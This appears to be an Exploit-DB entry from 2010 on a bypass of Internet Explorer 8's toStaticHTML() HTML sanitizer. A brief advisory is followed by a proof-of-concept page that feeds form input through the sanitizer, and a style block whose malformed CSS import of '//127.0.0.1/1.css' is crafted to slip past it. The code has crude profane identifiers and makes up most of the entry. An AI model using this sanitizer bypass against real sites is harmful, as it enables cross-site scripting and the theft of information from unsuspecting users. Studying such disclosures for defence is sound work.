Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass

EDB-ID:

34478


Platform:

Windows

Published:

2010-08-16

source: http://www.securityfocus.com/bid/42467/info

Internet Explorer 8 is prone to a security-bypass weakness.

Internet Explorer 8 includes a method designed to sanitize executable script constructs from HTML. Attackers can bypass this protection, allowing script code to execute on the client, for example in a 'postMessage' call.

Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible. 

<script type="text/javascript">
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);

ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
</script>

<form name="shit">
<textarea name=&#039;input&#039; cols=40 rows=20>
&lt;/textarea&gt;
<textarea name=&#039;output&#039; cols=40 rows=20>
&lt;/textarea&gt;

<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
</form>


<style>

} () import <%7D () import> url(&#039;//127.0.0.1/1.css&#039;);aaa

{;}

</style>

<div id="x">Fuck Ie</div>